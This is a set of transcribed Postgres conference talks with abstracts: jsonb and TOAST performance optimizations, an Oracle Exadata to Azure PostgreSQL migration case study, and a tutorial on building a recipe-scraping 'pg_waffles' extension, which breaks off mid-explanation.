points shifted down. The result for IMDB is the same: access to id (red), which was previously last, becomes much faster, and only roles, the big key, remains slow. Next, to optimize detoasting, we need to read only the needed chunks. We used the TOAST iterator from a patch developed by a Google Summer of Code student two years ago, which provides the ability to detoast chunk by chunk: for example, if we need only the jsonb header and the first keys from the first chunk, only that first chunk will be read. We also patched it to add the ability to decompress only the needed prefix of the toasted data. For the synthetic test we see that the situation also improved.
And this is what it becomes: access to the short keys is now almost independent of the jsonb size. This is the result of partial detoasting for IMDB, and we see the same picture; a big gap in access time, almost five times, between inline and toasted values still exists, so we need to optimize that too. If we look at how many blocks are needed by the arrow operator, access to the short keys now requires only four blocks — three index blocks and one heap block, heap here meaning the TOAST table — and only the green points remain high. In the previous step the colors were mixed, but with partial detoast, to access short keys we read only a constant four blocks, which is also a good optimization. Then we thought: what if we store the content of the first chunk inline, as much as will fit? So we developed a new storage type — provisional name "tapas" — which works similarly to extended storage, except that we try to store part of the first chunk inline. That gives us the last optimization for today. Here is the result for the synthetic test: the situation for short keys is greatly improved, and there is no longer a gap in access time to short keys between long and mid-size jsonb. The long roles key keeps the same performance — what can you do, it's a long key — but what's important is that short keys become very fast, almost three orders of magnitude faster. For IMDB we see the same results as in the synthetic test; some access-time gap remains between compressed and non-compressed jsonb, which we will investigate and probably improve. As for blocks read by the arrow operator, all the points have now shifted down: no additional blocks — a very good optimization. Here are the step-by-step results for the synthetic test. We started from the situation on master, then added sorted short keys, partial detoast and inline TOAST, and you can see how the results change: for these points we improve the situation by several orders of magnitude, while the long green key remains unchanged. For IMDB the results are slightly different but more or less the same: roles (green) remains unchanged, but for the short keys we gain two orders of magnitude, and for the long keys we can still get a very big improvement. So the conclusion is that with some simple and straightforward algorithmic and storage optimizations we can greatly speed up access to the short keys of jsonb. The same technique can be used for any data type with random access to parts of its data — for example arrays, or hstore. You can imagine a PDF data type whose header contains the offsets of specific pages: you could store a PDF inside jsonb and access different pages directly. I just remind you that we considered optimization of a popular pattern of using jsonb — some keys short, some long — and we optimized access to the short keys. Now the access time mostly does not depend on where these keys are placed in the jsonb, at the beginning or at the end; our optimizations made jsonb adaptive. We want to work on further optimizations: we want to introduce random access to TOAST, so that we can read only the required TOAST chunk and speed up access to the mid-size keys.
For example, if a jsonb contains 100 fields and each of them is one kilobyte in size, how do you get at just part of the value? We can also think about a TOAST cache, to avoid duplicate detoasting when a query has several jsonb operators and functions that use the same jsonb attribute — we would save the result of the first detoast. Another idea is deferred detoasting: in a chain of accessors, for example, we don't need to detoast the whole roles array, we can wait and detoast only the part of roles we need. We also made a very non-scientific comparison of Postgres with a recent MongoDB release. We checked access to the rare attribute height: we asked how many six-foot-tall people can be found in the IMDB database — the answer, in parentheses, is more than 10,000 people — and we just sequentially scanned the database in memory. In Postgres, shared_buffers was 16 gigabytes, and Mongo by default had about 22 gigabytes. You can see how the different optimizations help: Postgres actually becomes faster than Mongo, and inline TOAST alone already made Postgres faster. And if we include parallel execution — I remind you that in all other tests we disabled the parallel features of Postgres — then Postgres becomes much, much faster than Mongo. But again, this is a very non-scientific comparison. More details and results will be available at PGConf.Online 2021, which will be held at the beginning of March — here are the links to the conference, please register. You are welcome with your questions and suggestions; we will give a big, detailed technical talk about these optimizations there, and maybe we can add more optimizations like random TOAST access. Here is an example of our idea about random access: the original TOAST compresses first and then slices, which makes random access impossible; instead, we first slice the jsonb, then compress each slice and store it, and add an additional chunk-offset field. Then, from the header, it is possible to know which chunk we need to read. But this is just an idea — wait for the beginning of March and probably we can show this optimization. That was my last slide: all you need is Postgres. Thank you for attending.
Jsonb is a popular data type in Postgres and there is demand from users to improve its performance. In particular, we want to optimise a typical pattern of using jsonb as storage for relatively short metadata together with big blobs, which is currently highly inefficient. We will discuss several approaches to improving jsonb and present the results of our experiments.
10.5446/53283 (DOI)
Hello everyone and welcome to our talk about the migration. My name is Alicja Kucharczyk, I'm an EMEA Global Black Belt OSS Data Tech Specialist at Microsoft, and together with my colleague Sushant Pandey from the SQL Ninja team I conducted a successful migration from Oracle to Postgres for one of our customers. That is the story we would like to tell you a bit about. The source was an Oracle Exadata system. The target database was Azure Database for PostgreSQL, which is the PaaS service you can find on Azure, and the target Postgres version was 11. As you can see, the source and target had a similar, though not identical, configuration: both instances had four vCores, but on Postgres we had 16 gigabytes of RAM and on Oracle 32 of them. The scope of the PoC was only two packages out of really many of them — it was a huge system loaded with logic. The customer chose the two most complicated packages, to showcase whether Postgres would handle them well. Besides those two packages we also migrated some single objects and some schemas — tables from other schemas that were dependencies. For instance, we also migrated the whole logging package, because our packages were using it. The success criterion was basically performance: the main aim of this PoC was to check whether Postgres could be at least as performant as Oracle Exadata. The tests we ran were based on a custom script written by the customer, which went through those packages and exercised the procedures inside them with different values. The main tool we used for this migration is probably the most famous and most widely used tool for Oracle-to-Postgres migration, ora2pg, which created a framework for the migration. Not everything was migrated automatically — a lot was, and the rest required manual effort and some optimization. First, we want to show you the results. Sushant, over to you. Thank you, Alicja. I hope you can hear me okay. All right, let's talk about the results. The results were taken in three different parts, and the test sets were laid out as node 1 — execution 1 — with its duration, node 2 with its duration, and so on. Test 1 was for one of the functions that used a tree-traversal mechanism for hierarchical queries. As you can see, for nodes 1 and 2 the Oracle performance was quite good compared to PostgreSQL, and for node 7 as well; overall for test 1, Oracle performed quite well and Postgres was at about 12.5 percent of Oracle, so we were quite far behind on this piece. However, this is not the end of the story — we had some good news when we conducted the other tests. Test 2, which we call cursor-free execution, was for a function where we did not use any cursors, whereas the original Oracle function was using multiple cursors; we converted that code to use set-based queries. As you can see, for nodes 1 through 10 we got far better performance in Postgres than in Oracle — about 873 percent of Oracle. So this was one function where we received far better performance. There was another function, another test scenario, which we executed.
It was again a cursor-free execution, but here we came across one interesting scenario, which we will talk about in detail a little later. In this particular test we performed two executions — two "nodes", a node meaning an execution with different values. Here you also see better overall performance in Postgres compared to Oracle: about 117 percent of Oracle. So these were the test results. Now I am handing over to Alicja to talk about two code migrations that we did. Thank you, Sushant. We don't have time to talk about every part of this migration, because we've got only 30 minutes, so we've chosen some of the most important ones in our opinion. Let me start with the SYS_CONNECT_BY_PATH clause, which exists in Oracle but not in Postgres. The common way of migrating it to Postgres is with WITH RECURSIVE, which is probably one of the slowest kinds of queries you can have in your Postgres instance, so we tried to avoid those where possible — of course it's not possible in every case, sometimes WITH RECURSIVE really is necessary. SYS_CONNECT_BY_PATH is used in hierarchical queries: it returns the whole path of a column value from root to node, with a separator you choose — the typical id and parent-id scenario, where you are traversing a tree. Here is a code snippet from Oracle — only a really small part of the whole procedure, of course anonymized. You can see SYS_CONNECT_BY_PATH used with a comma, and then a window function, and the whole execution took 45 milliseconds. Because there is a DBMS_OUTPUT statement, you can see that this particular snippet just produces an ordered list of numbers — a pretty simple thing. In ora2pg, besides the export scripts that I commonly use (I always start a migration with the export script), you can also convert particular objects — a procedure, a type, or just a query — to Postgres. So I put this Oracle snippet into a file, told ora2pg it was a procedure, and that is the output ora2pg produced. The parts highlighted in red are pretty much bugs that will not work in Postgres: BEGIN appears twice, there is a TABLE statement after FROM — that syntax doesn't exist in Postgres — and there is a double semicolon. So even if ora2pg in this case gives you some kind of framework, a template for the migration, you need to put in manual work to make it run: get rid of the double BEGIN, get rid of the TABLE after FROM, fix the double semicolon. And even if you do all that extra work on this particular procedure, it will not be very performant on the Postgres side anyway, because WITH RECURSIVE is a really slow kind of query. So what we did was rewrite it completely: we kept the logic — for a given set of input parameters it produces the same output as in Oracle — but the statements were totally changed. And that is something we consider a really good practice.
So instead of writing your own functions and trying to reinvent the wheel, the first shot should be to try to find native Postgres functions you can use, and to use them instead of custom-written ones. We used unnest, which is a native Postgres function, ordered the result, and then used string_agg, which is a simple string aggregation — and that was it. Notice also that we didn't create any additional data type; we just used an array of numerics (it could be integer, by the way). The execution time was just 3 milliseconds. So instead of WITH RECURSIVE and complicated code, we used unnest and string aggregation and got an execution one order of magnitude faster on the Postgres side. The second example I would like to show you was loaded with BULK COLLECT, a cursor and FOR loops — nested loops. BULK COLLECT, for those of you who are not Oracle DBAs, is a clause that does an operation in bulk: instead of looping through single rows, it operates on a set of rows at one time. We don't have a BULK COLLECT clause in Postgres either. Here's the snippet from Oracle: first the cursor that was used, then we open the cursor, fetch it with BULK COLLECT, then comes the first loop, then a second loop which is a reverse loop, and then we aggregate the string. So in this simple and really short snippet you have a cursor, two FOR loops and BULK COLLECT — really not an easy one to migrate to Postgres. Again, if you run the snippet through ora2pg, you will see that ora2pg does not handle BULK COLLECT at all — it doesn't even try to convert it, it just leaves BULK COLLECT as it is, and obviously that will not work on Postgres; the code is otherwise pretty much unchanged. So what we did, again, was rewrite the whole procedure. The first thing we did — and we did the same in other procedures — was to take the cursor out of the function, because it was quite a commonly used cursor, used in many other procedures. Instead of repeating the same cursor over and over again, we created a SQL function — that's important, it's not a PL/pgSQL function but a SQL function — and put the cursor's query there. Then, as you can see, the code uses completely different kinds of statements. We don't have BULK COLLECT, and one way to migrate it is to create a temporary table. With BULK COLLECT in Oracle you can, for instance, take a count of the collection or fetch particular rows — you can do a lot of operations. In Postgres you can just iterate over the results, you don't have that many options, but a temporary table does give you those options: if you have an even bigger data set you can put indexes on the table to make it more performant, and you can do a lot of other things with it. So first we ran this function — the old cursor — and saved the results as a temporary table, and we also deleted all the rows where the row number was one. Why? Because — and this is not obvious — if you go back to the Oracle snippet, you will see that the last loop is a reverse loop, so it effectively starts at two; there is no one.
So the Postgres way, the temporary-table way of migrating that, is for instance just deleting those rows. Then you see ANALYZE, because Postgres doesn't run autovacuum on temporary tables. And then we've got just one loop instead of nested loops, again using the string_agg function to put the results together. If you look at both sides, it looks like a totally different procedure, right? And it produces exactly the same result. Sometimes it's not possible to migrate code as it is; sometimes you first need to understand what is happening inside your procedure and then choose a totally different way of doing things, because we need to remember it's a completely different engine anyway. As you can see, with this rewrite we also achieved much better performance than Oracle: 14 milliseconds versus 41 milliseconds. OK, the next example — Sushant, over to you. Yeah, Alicja, thank you. OK. The snippet you see here is the conversion of an Oracle function into Postgres. What made this function special is that it used a lot of table functions, which are native to Oracle, it used dynamic queries, and it used a ref cursor as the output type of the function — or procedure, we can say. What we did was convert the return type to a set of records instead of a ref cursor. We compared both approaches in PostgreSQL and found that the set of records performed far better than the ref cursor. For those who can make out the yellow highlights: inside the dynamic query we used the unnest function to open the arrays that were passed as dynamic parameters to this particular query, and the result set of the dynamic query is returned as a set of records to the calling function. There is another yellow section at the bottom which shows how to return a set of records from a dynamic query in a Postgres function. The execution time we saw here was 31 milliseconds, compared to about 28 seconds in Oracle. So the set of records was the better choice compared to the ref cursor in our case. Now, moving ahead, this is the piece I spoke about in the third test result: the specific scenario where we saw that the data type mapping of fields that are joined to each other can be a bit problematic if the types are not the same. How did we realize it? We had the query shown in the top left corner, where we are joining — I tried to highlight it in yellow; it's the first join, on table D and table E. Table E's column was of numeric type and table D's column was of bigint type. On the right-hand side you can see two comparisons, done after we identified the problematic situation. The middle section of the screen shows the execution plan, and the red-highlighted section is what I'm talking about: the column of table D is getting typecast to numeric to match the type of table E's column, which was numeric.
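To make the rewrites described above a little more concrete, here is a hedged sketch of the Postgres-side patterns: string aggregation over an unnested array, a temporary table standing in for BULK COLLECT, returning rows from a dynamic query instead of a ref cursor, and aligning join column types. All object and function names are invented for illustration — this is not the customer's actual code.

```sql
-- 1. Path/list building with native functions instead of WITH RECURSIVE
SELECT string_agg(v::text, ',' ORDER BY v) AS ordered_list
FROM   unnest(ARRAY[4, 1, 3, 2]::numeric[]) AS v;

-- 2. BULK COLLECT replacement: materialize the old cursor's query in a temp table
CREATE TEMP TABLE tmp_rows AS
SELECT rn, val
FROM   old_cursor_query();          -- hypothetical: the cursor rewritten as a SQL function

DELETE FROM tmp_rows WHERE rn = 1;  -- the Oracle reverse loop effectively started at 2
ANALYZE tmp_rows;                   -- temp tables get no autovacuum/autoanalyze

SELECT string_agg(val::text, ',' ORDER BY rn DESC) FROM tmp_rows;

-- 3. Return rows from a dynamic query instead of an OUT refcursor
CREATE OR REPLACE FUNCTION get_sales(p_customer_ids bigint[])
RETURNS TABLE (sale_id bigint, customer_id bigint, sale_date date)
LANGUAGE plpgsql AS
$$
BEGIN
    RETURN QUERY EXECUTE
        'SELECT s.id, s.customer_id, s.sale_date
           FROM sales s
           JOIN unnest($1) AS f(id) ON f.id = s.customer_id'
    USING p_customer_ids;
END;
$$;

SELECT * FROM get_sales(ARRAY[1, 2, 3]::bigint[]);

-- 4. Align join column types so the planner can use the index (no implicit cast)
ALTER TABLE sales ALTER COLUMN customer_id TYPE bigint;   -- e.g. if it had been numeric
```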
Now, back to the join: because of this typecast we were seeing poor performance — the function was taking somewhere close to nine seconds. When we converted the numeric column to bigint and executed the query again, we got super fast performance. As you can see in the bottom image of the slide — I tried to highlight it in yellow — there is now an index scan on table D; that index was not getting used when we had different data types. With matching data types the index was used and we got the desired performance: 31 milliseconds, which in the actual results was better than Oracle. So that was one of our experiences. Based on our experience of this whole work, we saw that there are some generic rules you can probably follow. We are not saying that you will get better performance than Oracle every time, but in our scenario we beat Oracle most of the time. For nested loops, try to reduce the looping when you convert the code and put in some improvements, as Alicja also showed in her examples of converting Oracle code to Postgres. If you have dynamic queries, you can try to improve them and make them more performant — we were able to do that after changing some of the logic and reducing some of the FOR loops. Then there are ref cursors: we compared ref cursor execution with a set of records as the output type, and we found that the set of records gave us better results. So this was the whole story we worked on for one of our customers. If you want to find out more about Azure Database for PostgreSQL, there are a few links where you can have a look at the information available: some blogs from Microsoft on PostgreSQL, plus documents and migration tutorials. If you need more, there is also a version called Citus, which is open source — you can read about it at aka.ms. If you have further questions about Azure Database for PostgreSQL, you can reach out to us at the given email address. So that is it from our side — and you can see Alicja has converted back to the PostgreSQL elephant. Thank you, folks. Thank you, everyone, for listening to us; the forum is now open for questions and answers, so please go ahead and ask your questions. We are here to answer them if possible; otherwise we can be contacted at the email addresses and share our thoughts later. Thank you so much. OK, we are online. Thanks, Alicja, for the talk. We have several questions, and you have probably already answered many of them. So: how do you feel about migrating from Oracle to PostgreSQL? Really great — especially when we can prove that PostgreSQL can be much, much more performant than Oracle. People usually don't believe that's possible, and then you just start showing the numbers: OK, here we are much better than Oracle Exadata, and here we are also much better than Oracle Exadata. And yeah, PostgreSQL works.
So from what I see, the main problems were with the function and procedure code itself. What do you think — is it possible to automate that migration somehow, using artificial intelligence or maybe some other techniques? Yeah.
The story about a challenging PoC that proved that Postgres can achieve the same performance as Oracle Exadata. The schema that was migrated wasn't the simplest one you might see. It was quite the opposite. The code was loaded with dynamic queries, BULK COLLECT's, nested loops, CONNECT BY statements, global variables and lots of dependencies. Ora2pg did a great job converting the schema but left a lot of work to do manually. Also, estimates produced by the tool were highly inaccurate, since the logic required not a migration but a total re-architecture of the code. In this talk we want to present how a Microsoft team composed of people from two different teams approached the project and solved the migration issues using ora2pg, and was able to prove that Postgres Single Server can perform equally well as Oracle Exadata. We will present our ways of working and also some of the main technical challenges that we faced, including: • How estimates do (not) work • How we handled BULK COLLECT's • Why we got rid of refcursors • How we got stuck with testing of one of the packages and how the help from a friend solved the problem • How we handled hierarchical queries and drilling down the hierarchy.
10.5446/53285 (DOI)
Hello. Welcome to the Postgres devroom, and welcome to this Postgres talk. You can see that I'm not at my desk; I'm in my kitchen, because I will be baking waffles while delivering a conference talk about Postgres extensions, using the practical example of an extension I created specially for you: pg_waffles. My name is Lætitia Avrot, I'm a senior database consultant for EDB. I've been working with Postgres since 2007, so I have a little experience with it. I'm involved in the community: I've been a Postgres Code of Conduct committee member, I'm also a Postgres Women co-founder, and I'm involved with PostgreSQL Europe and this devroom. If you've already seen one of my conference talks, you might know that I like very clean and pure slides, with mostly images and very little text. If for whatever reason you need more text, go to my website — you will find a conference talks tab there, and you will have a direct link to the annotated slide deck that will help you follow this talk. You can follow me on Twitter under @l_avrot, and if you'd like to bake waffles with me during this talk, go into your kitchen: you just need some flour, some sugar, some butter and some eggs. And that's all. So why waffles? It's FOSDEM, but we won't be in Brussels. It's FOSDEM, but we won't meet our community friends, and we won't be able to have beers and waffles together. That's very sad, so to cheer up, and to cheer myself up, I decided to bake waffles, just to make the FOSDEM spirit live a little more. So, in this talk, I will explain what an extension is and how you can create one. I will use the practical example of a custom-made extension, which is called pg_waffles. This extension's only goal will be to display a waffle recipe in Postgres. You will see, it's very simple. So, what is an extension? An extension is a package that holds several database objects. What is an object? It's very wide: it can be schemas, views, materialized views, tables, functions, procedures, or whatever you want. And of course, you're always allowed to create those objects without using an extension. So the next question you can ask yourself is: why would I need an extension for my database objects? The answer can be found in the official Postgres documentation: a useful extension to PostgreSQL typically includes multiple SQL objects; for example, a new data type will need new functions, new operators, and probably new index operator classes. It is therefore helpful to collect all these objects into a single package to simplify database management. So, simply put, you just want to simplify your database management. So, when were Postgres extensions created, how did it happen, and so on? The first thing I can say is: it's very old, as old as May 1986. Some of you might not even have been born at that time. I was, but I was not of an age to be reading Dr. Stonebraker and Professor Rowe's design of Postgres paper. What you can see is that it was already among the main goals in the design of Postgres: the second goal of Postgres was to allow new data types, new operators, new access methods and more, and this should be implementable by non-experts, with easy-to-use interfaces. That was already in Dr. Stonebraker's thoughts when he designed Postgres. And then what happened? We need to jump to 2005, where Fabien Coelho and a guy named Peter — I'm so sorry, I was not able to find his full name — created a Makefile framework to help with building extensions.
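As a small illustration of the "package of objects" idea described above (the extension name pg_trgm here is only a common example, not something from the talk), you can ask the catalogs which objects an installed extension owns:

```sql
-- All installed extensions and their versions:
SELECT extname, extversion FROM pg_extension;

-- Every object that belongs to one extension (pg_trgm is only an
-- example name); membership is recorded in pg_depend with deptype 'e'.
SELECT pg_describe_object(classid, objid, 0) AS owned_object
  FROM pg_depend
 WHERE refclassid = 'pg_extension'::regclass
   AND refobjid   = (SELECT oid FROM pg_extension WHERE extname = 'pg_trgm')
   AND deptype    = 'e';
```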
And I think extensions are great, but how can you advertise your extension? How can people know this extension exists and can be very useful in production? That's why David Wheeler created PGXN, the PostgreSQL Extension Network, so that you can look for extensions and find them very easily. And Dimitri Fontaine, with some help from his company, created the very useful statements CREATE, ALTER and DROP EXTENSION, so that you can create your extension using a single SQL statement. The next step was in 2016, when Petr Jelínek added a CASCADE option to the CREATE EXTENSION statement, so that creating an extension can, by cascading, create another extension it depends on. I used that once when I was creating an extension to be able to use a foreign data wrapper. So if you still don't get what an extension is, I bet that you already use extensions inside your Postgres. The first one I will give as an example is the one we always forget, because it's so huge we forget it's a Postgres extension: PostGIS, which is meant to deal with geographical data. On top of it, the Université Libre de Bruxelles created an extension called MobilityDB, based on Postgres and PostGIS, to make working with temporal geographical data easier. And on your production system you might find something like pg_stat_statements. This extension is very, very handy when you need to gather performance statistics, when you want to know how your queries perform, which ones you need to make better, and so on. That's very, very useful. Another one you can find useful for performance purposes is auto_explain, which will log into the Postgres log file the explain plan for slow queries. That's very useful, but it can harm your performance by doing so, so use it with some care. pgcrypto will help you encrypt your data, so you can find that very useful. pg_prewarm is a little less used now; it helps load your data into either the OS cache or the Postgres buffer cache, so that can speed up your queries when Postgres is starting. Then you might have heard about Citus. Citus is a very useful extension that helps you horizontally shard your database. That's very helpful when you have a very huge database. Well, just remember that when I have a customer with a very huge database, my first question is: are you sure you need all this data? Just keep that in mind. Then, if you're French like me, you might find it useful to have the unaccent extension, so that you can run full-text search on some text without worrying about accented letters. That's very, very useful. I love the idea of ZomboDB, where you can query an Elasticsearch index on top of Postgres. And then maybe you've heard about foreign data wrappers. Foreign data wrappers are meant to help you deal with basically any data source: it can be anything you can think of, from a flat file to a NoSQL database, any other database, any other kind of IT thing where you can store data. Each foreign data wrapper is an extension, so you might need to install those one by one. But what we want is waffles. So the first thing you need to know: we will go to the allrecipes website, we will look for waffle recipes and we will sort them by rating, assuming that the best-rated one will be the best waffle recipe. That's not for sure — we know how it works with the internet — but let's assume it's the case here. After that, we will take the first link, we will then go to that new web page, and we will look for the ingredients and steps needed for this recipe.
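Going back to the statements and extensions mentioned a moment ago, here is a hedged sketch — assuming pg_stat_statements is also listed in shared_preload_libraries, and using earthdistance/cube as the classic CASCADE example:

```sql
-- pg_stat_statements additionally has to be listed in
-- shared_preload_libraries in postgresql.conf before it records anything.
CREATE EXTENSION IF NOT EXISTS pg_stat_statements;

-- CASCADE (PostgreSQL 9.6+) also creates the extensions this one
-- depends on; earthdistance, for instance, pulls in cube.
CREATE EXTENSION earthdistance CASCADE;

-- The ten statements that consumed the most execution time
-- (column names as of PostgreSQL 13; older releases use total_time).
SELECT calls,
       round(total_exec_time::numeric, 1) AS total_ms,
       query
  FROM pg_stat_statements
 ORDER BY total_exec_time DESC
 LIMIT 10;
```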
We will store everything inside a data model and then we will display the recipe. Very simple. So what is the recipe to create a Postgres extension? The first step is technically the simplest one, but maybe the most complex one: you will need to find a great name. You will need to check whether that name is already taken and things like that. The second step is the fun part, where you play with the source. The third part is where you will create your extension with a Makefile and a control file. And the fourth part is when you will test your extension using CREATE EXTENSION. After that, you will be able to release your extension on the PostgreSQL Extension Network. The first step was finding a great name. As I said, you might need to look for a name that is not already taken. That's the first thing, but it's not all. You won't be able to use an extension name with a hyphen in it — that's very important, it's forbidden in Postgres to have hyphens in identifiers. Just as in Postgres, you can use dollar signs inside your identifiers, but that's not SQL-standard compliant. I decided to go with the simplest: pg_waffles. I wanted my name to be not too long, because I know that while developing my extension I will have to type that name a lot of times. That's why I decided to go with something short, but I wanted something meaningful; that's why I went with pg_waffles. Let's go into the fun part: the source code. Maybe you're asking yourself how we will be able to parse HTML files with Postgres. Well, that's quite simple. I created a temporary table. It's easy to use, and on top of that, when you close your session it will be automatically dropped, so you don't have to care about that. This table will have only one column, called html, where you will find the HTML source code of the search on allrecipes. So how do I get this source code inside Postgres? First, I tried to parse HTML using Postgres and that was not easy. So I decided to rely on the wonderful W3C set of tools, using hxnormalize to normalize the source code and hxselect to select only one tag, with a tag selector that is the exact same thing you use when you use CSS. Then I decided to get rid of the newlines, because I wanted everything in one row — you don't know where a newline will happen; in the raw source code, newlines can happen inside an HTML tag, and that would not be good for Postgres. So I used tr to get rid of the backslash-n, meaning a newline. After that, I was able to select all the recipes from my temporary table, and I had all my links from the first one, meaning the best ranking, to the last one. Well, only the top 20, because there is pagination on the results of the search. But I only need the first one, so I'm fine. Now I need to use SQL to be able to get the green part, URL1. How can I do that? So here, just as a reminder, here is the kind of data I have inside my table, and here is how I will get it. The first thing is the WITH list element. A WITH list element can also be called a common table expression, or CTE. You might have encountered them before. So I use regexp_split_to_table: it's a text function already integrated into Postgres that will take a text, use another text as a separator, and give you all the results in separate rows. So we have one row per URL, with some stuff at the end that I don't want, because I will have things like that, and I will have to get rid of the part of my URL that I don't want.
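A rough sketch of that splitting technique, with invented sample markup and separators (the real extension works on the actual allrecipes.com page source, which looks different):

```sql
-- Invented sample markup; the real html column holds the normalized
-- allrecipes.com search results loaded with the W3C tools and tr.
CREATE TEMPORARY TABLE allrecipes (html text);
INSERT INTO allrecipes VALUES
  ('<a href="https://example.org/recipe/1/">one</a>'
   '<a href="https://example.org/recipe/2/">two</a>');

WITH links AS (
    -- one row per chunk following an href attribute
    SELECT regexp_split_to_table(html, 'href="') AS chunk
      FROM allrecipes
)
SELECT split_part(chunk, '"', 1) AS url   -- keep what precedes the closing quote
  FROM links
 WHERE chunk LIKE 'http%'                 -- drop the leading non-URL fragment
 LIMIT 1;                                 -- the best-ranked recipe only
```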
That's why after that I have to use split_part here, to get rid of anything after that. The split_part function is also already integrated into Postgres: it will split a text using a separator and then give you the part you asked for. As it's SQL, everything begins with one, so I used one because I wanted the first part, that one. And then I just used a simple WHERE clause here to get rid of the first part that I did not want — there were some things there that I did not want, I just wanted that URL. So I have all my URLs, but I want only the first one. So now I will go into that HTML source code and look at how I will be able to retrieve ingredients and steps from it. First surprise: when you open the page, there is an ASCII-art unicorn as an HTML comment at the beginning of the web page. That's very nice, and I once said that a slide deck is not perfect if there is no unicorn in it, so this one was easy to find. After that, I went down and I found out that everything I needed was already stored in a JSON-like text inside a tag named script. So I thought I could maybe isolate that tag, isolate that JSON, and parse the JSON instead of parsing HTML source code — that would be easier to do with Postgres. So that's what I did. But first, I needed to create a new temporary table. My table will be called processed_recipe. I will have a data column, which is text and will be some kind of wrapper around my JSON, and after that I will be able to isolate my JSON and store it in the recipe column, of type jsonb. I chose jsonb for performance reasons, because jsonb performs better than json, even though I will have only one recipe in my table. But who knows, maybe one day you will have more than 1000 waffle recipes and you'll be very happy to have jsonb instead of json. Then I added a title column, and I made it a generated column. I don't know if you already know about generated columns; it's a very, very useful feature in Postgres that allows you to have data generated on top of other columns. First, what I wanted was my jsonb column, the recipe column, to be generated out of the data column. But I found out that you are not able to generate a column on top of another generated column. So I had to restrain myself and say, OK, I will first have the data column, then I will update the table to get the recipe column, and on top of that I will use generated columns to get any information I need. The title, I found out, was stored inside the JSON under the key name, so I just had to extract that key — you see that I use the arrow operator that you can use with JSON. Then I will have all those other columns, like image, description, yield and so on — everything you need for a recipe, ingredients, steps. I will add a keywords column, which is a text array, just in case I want my extension to be able to store other recipes than waffle recipes. You might want to search for beef stew, and then you will be able to store that in the same table, and you just don't want to mix a beef stew recipe with a waffle recipe. And then I will store the rating as double precision. I could have used a numeric, but precision is not very important here, so I can use a double. I will use the exact same trick to get my tag, with the hxselect tool: my tag is script, with a type equal to application/ld+json.
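Here is a trimmed-down, hypothetical version of such a table — only a couple of the generated columns, and the JSON key names are assumptions based on typical schema.org recipe markup:

```sql
CREATE TEMPORARY TABLE processed_recipe (
    data        text,     -- raw contents of the <script type="application/ld+json"> tag
    recipe      jsonb,    -- the isolated JSON document, filled in later by an UPDATE
    title       text GENERATED ALWAYS AS (recipe ->> 'name') STORED,
    description text GENERATED ALWAYS AS (recipe ->> 'description') STORED,
    keywords    text[],
    rating      double precision
);

-- Generated columns are recomputed automatically, so isolating the JSON
-- is enough to populate title and description, e.g.:
-- UPDATE processed_recipe SET recipe = <expression extracting the JSON from data>;
```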
And I found out that I had to use sed to escape my backslashes, because there were some backslash-n's — newlines — being interpreted by Postgres inside the JSON, and I really needed these newlines not to be interpreted by Postgres. So I added a sed command, which is, again, a little complex, because I had to escape the backslashes from the backslashes that sed itself can interpret. But I assure you it works. And then, as I said, I just need to update my processed_recipe table to isolate the JSON data inside my recipe column. And then I use an update here to fill the keywords column with an array containing Belgium and waffles. So now I have my JSON and it's parsed. I have my ingredients as an array of text, I have my steps as a JSON array of JSON objects, and all the others are simpler. Now I need a data model. How do we create a data model? I won't explain how to create a data model, because that's something you should have learned at school; if you haven't, you will find wonderful books explaining how to do that. What I did here is use three tables — ingredient, recipe and step — with relations, because a recipe has instructions, called steps, and a recipe needs ingredients. And on the relation between recipe and ingredient, you will have some qualifiers like quantity, unit and yield. I'd like to point you to Mocodo, which is a tool I love, because out of a text description it will display a rough sketch of your data model. That's very, very useful, and you're welcome to use it — it's open source. So after that it was very easy to create my tables. For performance reasons — again, I know that I will have only one recipe in my tables, but who knows what my extension will become — I used integer primary keys. To prevent anyone from manually adding data inside this ID column, I used GENERATED ALWAYS AS IDENTITY. To be sure that I won't be able to add the same ingredient several times by adding the same name with different IDs, I added a unique and a not-null constraint on the name of the ingredient. I did the exact same trick for the recipe table, so there's nothing new here. And you see here that I have a fourth table, because we had a 0,n relation between recipe and ingredient, so we need a table between them. Very simply, it will have the recipe ID, the ingredient ID, and then the qualifiers we had seen. And now it's time to insert everything into my tables. If you're wondering how to do that, and you're asking yourself how you will be able to retrieve the ID of the recipe to use for the steps, or things like that: just know that I did that in only one query. It's long — around 110 lines of SQL — and I use a lot of WITH list elements. I also use the RETURNING clause on an update or an insert to be able to get the ID of the recipe or of the ingredient, so that I can populate all my tables at once. If you're very curious about it, I will give you access to the source code of my extension at the end of this presentation. Please go there, and if you'd like to make it better, you're very welcome. So, I'm back at my desk, just to explain to you how I managed to insert data inside four tables in one single SQL query. My code won't have a lot of comments, because I wanted it to fit on a slide, but it's not that complicated. So first, I used a lot of WITH list elements, and the first one is the one where I will insert data inside the recipe table.
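Before looking at that query, here is one possible rendering of the data model described above in SQL — the real extension's DDL may differ in names and extra columns, but it shows the identity keys, the unique and not-null constraints, and the join table carrying the qualifiers:

```sql
CREATE TABLE ingredient (
    ingredient_id integer GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
    name          text NOT NULL UNIQUE
);

CREATE TABLE recipe (
    recipe_id   integer GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
    title       text NOT NULL UNIQUE,
    description text
);

CREATE TABLE step (
    step_id     integer GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
    recipe_id   integer NOT NULL REFERENCES recipe,
    step_number integer NOT NULL,
    instruction text NOT NULL,
    UNIQUE (recipe_id, step_number)
);

-- The 0,n relation between recipe and ingredient becomes a join table
-- carrying the qualifiers (quantity, unit, ...).
CREATE TABLE ingredient_in_recipe (
    recipe_id     integer NOT NULL REFERENCES recipe,
    ingredient_id integer NOT NULL REFERENCES ingredient,
    quantity      numeric,
    unit          text,
    PRIMARY KEY (recipe_id, ingredient_id)
);
```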
